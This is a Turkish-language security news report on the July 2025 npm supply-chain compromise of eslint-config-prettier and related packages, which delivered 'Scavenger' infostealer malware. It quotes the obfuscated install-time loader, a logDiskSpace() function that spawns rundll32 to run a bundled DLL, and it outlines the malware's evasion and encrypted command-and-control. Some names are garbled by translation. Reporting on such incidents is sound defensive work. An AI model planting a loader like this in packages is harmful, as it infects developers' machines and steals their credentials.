JavaScript geliştiricilerini hedefleyen gelişmiş bir tedarik zinciri saldırısı, siber suçluların yeni tanımlanan “çöpçü” kötü amaçlı yazılımlarını dağıtmak için çok sayıda popüler NPM paketini tehlikeye attığı 18 Temmuz Cuma günü ortaya çıktı.
Saldırı öncelikle Eslint-Plugin-Prettier, Snyckit, @PKGR/Core ve Napi-Postinstall dahil olmak üzere diğer birçok geliştirme araçıyla birlikte yaygın olarak kullanılan bir kod biçimlendirme paketi olan Eslint-Config-Prettier’e odaklandı.
Uzlaşma, GitHub kullanıcıları, projenin GitHub deposuna yansıtılmamasına rağmen, NPM kayıt defterinde görünen Eslint-Config-Prettier şüpheli sürümlerini bildirdiğinde keşfedildi.
.webp)
Paket koruyucu daha sonra NPM hesaplarının bir kimlik avı e -posta kampanyasıyla tehlikeye atıldığını doğruladı ve saldırganların 8.10.1, 9.1.1, 10.1.6 ve 10.1.7 dahil olmak üzere birden fazla paket sürümünde kötü amaçlı sürümler yayınlamasına izin verdi.
Humpty’nin RE blogu, kötü amaçlı yazılım varyantları boyunca bulunan “SCVNGR” ve “Çöpçü” dizelerine birden fazla referans nedeniyle kötü amaçlı yazılım ailesini “çöpçü” olarak tanımladı.
Saldırı, tedarik zinciri tehditlerinde önemli bir artışı temsil ediyor, çünkü dünya çapında JavaScript projelerine rutin olarak yüklenen güvenilir geliştirme araçları aracılığıyla geliştirici ekosistemini hedefliyor.
Kötü amaçlı yazılımların etkisi, özellikle krom tabanlı tarayıcıları ve uzantılar, ServiceWorkerCache, DawnwebgPucache ve ziyaret edilen bağlantılar dahil olmak üzere ilgili veri depolarını hedeflediği için tipik bilgi çalmanın ötesine uzanır.
Bu hedefleme, saldırganların özellikle bu araçları kullanan yazılım geliştirme profesyonellerinden geliştirici kimlik bilgileri, oturum jetonları ve tarama modellerini hasat etmekle ilgilendiklerini göstermektedir.
Enfeksiyon mekanizması ve kod yürütme
Çöpçü kötü amaçlı yazılım, tehlikeye atılan Eslint-Config-Prettier paketi aracılığıyla sofistike bir enfeksiyon vektörü kullanır.
Kurulum üzerine, kötü amaçlı paket, aldatıcı bir şekilde adlandırılan bir kurulum dosyası yürütür. logDiskSpace() İlk yük dağıtım mekanizması olarak hizmet veren işlev.
.webp)
İşlev, kötü amaçlı yükü yürütmeden önce Windows sistemlerini kontrol eden kasten gizlenmiş JavaScript kodu içerir:-
function logDiskSpace() {
try {
if(os.platform() == 'win32') {
const tempDir = os.tmpdir();
require('chi'+'ld_pro'+'cess')["sp"+"awn"]
("rund"+"ll32",
[path.join(__dirname, './node-gyp' + '.dll') +
",main"]);Bu kod parçası, Windows ‘Rundll32.exe yardımcı programını kullanarak Node-gyp.dll adlı paketlenmiş bir DLL dosyasını yürütürken, statik analiz araçlarından kaçmak için saldırganların dize birleştirme kullanımını gösterir.
Saldırı (2025-07-18 08:59:38 UTC) ile aynı gün derlenen kötü amaçlı yazılım yükleyicisi, SMBIOS ürün yazılımı tablosu numaralandırması ve Avast, Sandboxie ve Comodo antivirus gibi güvenlik araçları için işlem alanı taraması yoluyla VM algılama dahil olmak üzere birden fazla anti-analiz tekniği içerir.
Kötü amaçlı yazılım, komuta ve kontrol iletişimleri için 0x9e3779b9’un ayırt edici bir delta değeri ile XXTEA Block Cipher şifrelemesini kullanır ve ödün verilen altyapıdan bazal kodlu yanıtlar yoluyla ilk temas kurar.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.